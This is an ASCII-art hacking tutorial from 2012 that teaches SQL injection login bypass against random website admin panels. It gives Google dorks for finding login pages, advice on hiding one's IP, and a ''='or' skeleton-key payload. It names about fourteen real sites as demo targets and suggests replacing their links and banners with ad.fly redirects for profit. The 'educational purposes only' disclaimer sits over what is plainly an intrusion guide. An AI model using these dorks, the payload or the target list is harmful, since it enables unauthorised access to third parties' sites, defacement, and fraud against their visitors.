diy sql

1. +-==============================================================-+
2. | _____ _______ __ _____ _ _ |
3. | | __ \_ _\ \ / / / ____| (_) | | |
4. | | | | || | \ \_/ / | | __ _ _ _ __| | ___ |
5. | | | | || | \ / | | |_ | | | | |/ _` |/ _ \ |
6. | | |__| || |_ | | | |__| | |_| | | (_| | __/ |
7. | |_____/_____| |_| \_____|\__,_|_|\__,_|\___| |
8. | __ __ __ _____ ____ _ _ __ __ __ |
9. | \ \ \ \ \ \ / ____|/ __ \| | (_) / / / / / / |
10. | \ \ \ \ \ \ | (___ | | | | | _ / / / / / / |
11. | > > > > > > \___ \| | | | | | | < < < < < < |
12. | / / / / / / ____) | |__| | |____| | \ \ \ \ \ \ |
13. | /_/ /_/ /_/ |_____/ \___\_\______|_| \_\ \_\ \_\ |
14. | |
15. | A N O F F I C I A L G U I D E |
16. +-==============================================================-+
17. | Vulnerability Disclosure: |
18. | The vulnerability is located in the `username` and `password` |
19. | input field values of the `login` module. Remote attackers are |
20. | able to execute own sql commands by manipulation of the GET |
21. | method request with the vulnerable username and password |
22. | parameter. The request method to inject the sql command is GET |
23. | and the issue is located on the application-side of the |
24. | online-service. The sql vulnerability allows an attacker to |
25. | remotely gain unauthorized access to the account system of the |
26. | content management system. |
27. +-==============================================================-+
28. | Request Method(s): |
29. | [+] GET |
30. | Vulnerable Module(s): |
31. | [+] Login |
32. | Vulnerable Parameter(s): |
33. | [+] username |
34. | [+] password |
35. +-==============================================================-+
36. | _______ _ _ _ |
37. | |__ __| | | (_) | | |
38. | | |_ _| |_ ___ _ __ _ __ _| | |
39. | | | | | | __/ _ \| '__| |/ _` | | |
40. | | | |_| | || (_) | | | | (_| | | |
41. | |_|\__,_|\__\___/|_| |_|\__,_|_| |
42. | |
43. | In this tutorial we will be pen testing random administration |
44. | panels from around the world. This is a method pen-testers use |
45. | to bypass weak CMS/Admin Panels. This method requires No |
46. | experience. |
47. | |
48. | 1.) Protect your IP# from being logged: |
49. | Hacking like this is illegal, so taking the risk is entirely |
50. | up to you, I take no responsibility. For educational purposes |
51. | only. |
52. | |
53. | Ok before we began you need to protect your IP# from being |
54. | logged by the server your about to hack into, for this were |
55. | gonna need a proxy/VPN (Virtual Private Network) I'd suggest |
56. | using Tor if you have it, if not I would recommend using |
57. | Hotspot Shield for this tutorial (it's free) |
58. | https://www.hotspotshield.com/ |
59. | |
60. | IP Test: |
61. | http://whatismyipaddress.com/ |
62. | To Test your IP, Turn on your proxy/VPN and refresh the page |
63. | above, if your IP# changes your good. If not try again until |
64. | it does. |
65. | |
66. | Next you need to Disable WebRTC in your web browser to prevent |
67. | your VPN from leaking your REAL IP Address. |
68. | http://hackforums.net/showthread.php?tid=4682819 |
69. | |
70. | 2.) Go to Google & Search: |
71. | intitle:Admin inurl:login.php site:.com |
72. | |
73. | ***Screenshot: http://i.imgur.com/6FKY2xS.jpg*** |
74. | ^^This will be your Main Dork. You can modify it to find more |
75. | vulnerable admin panels. |
76. | |
77. | EXAMPLES: |
78. | intitle:Admin inurl:login.php site:.net |
79. | intitle:Admin inurl:login.php site:.org |
80. | intitle:Admin inurl:login.php site:.uk |
81. | intitle:Admin inurl:login.php site:.br |
82. | |
83. | To find more Web Country Codes, go to: |
84. | http://goes.gsfc.nasa.gov/text/web_country_codes.html |
85. | |
86. | Other dork extensions you could try. |
87. | inurl:/admin_login |
88. | inurl://admin/_login.php |
89. | inurl://panel/admin.php |
90. | inurl://admin/admin_login.php |
91. | inurl://administracao/ |
92. | inurl://admin/autentica/loga.php |
93. | |
94. | 3.) Locating vulnerable admin panels: |
95. | Locating vulnerable admin panels is a slow process and |
96. | requires a little patience but the payout is half the fun. |
97. | Enter your Google dork (posted above), starting at page 1 in |
98. | google (Right-Click>Open link in new tab) start clicking on |
99. | links one by one until you have 5-10 tabs open in your |
100. | browser. |
101. | |
102. | 4.) Skeleton Key: |
103. | USERNAME: '=' 'or' |
104. | PASSWORD: '=' 'or' |
105. | |
106. | Once at the admin panel, enter your Skeleton Key in attempts |
107. | to bypass: |
108. | ***Screenshot: http://i.imgur.com/04mGZ0Q.jpg*** |
109. | ***Screenshot: http://i.imgur.com/K3IxjkX.jpg*** |
110. | |
111. | 5.) Demos: |
112. | http://www.sdcsm.org/webadmin/login.php |
113. | http://dhansirirestaurant.com/webadmin/login.php |
114. | http://www.viewoptics.in/webadmin/login.php |
115. | http://oco.net/login.php |
116. | http://www.cyclismactu.net/new_admin/login.php |
117. | http://www.khondantainews.net/login.php |
118. | http://pigeontools.net/amulet/login.php |
119. | http://www.shivalikinstitutions.com/login.php |
120. | http://www.lifethroughalens.com/login.php?page=index.php |
121. | http://www.sgpgiuromeet.com/login.php |
122. | http://paigeglass.com/login.php |
123. | http://kopkarjembo.com/area/admin.php |
124. | http://mycreativekidscommunitywatch.com/admin/login.php |
125. | http://motektech.com/login.php |
126. | |
127. | That's it! Once your in the admin panel you can start editing |
128. | the site. To take advantage of this replace links, banners |
129. | directory's ..ect with your ad.fly: link to redirect users |
130. | and earn money. |
131. +-==============================================================-+
132. (c) ｍＯｂｉＩｅ | Edited Tutorial 2012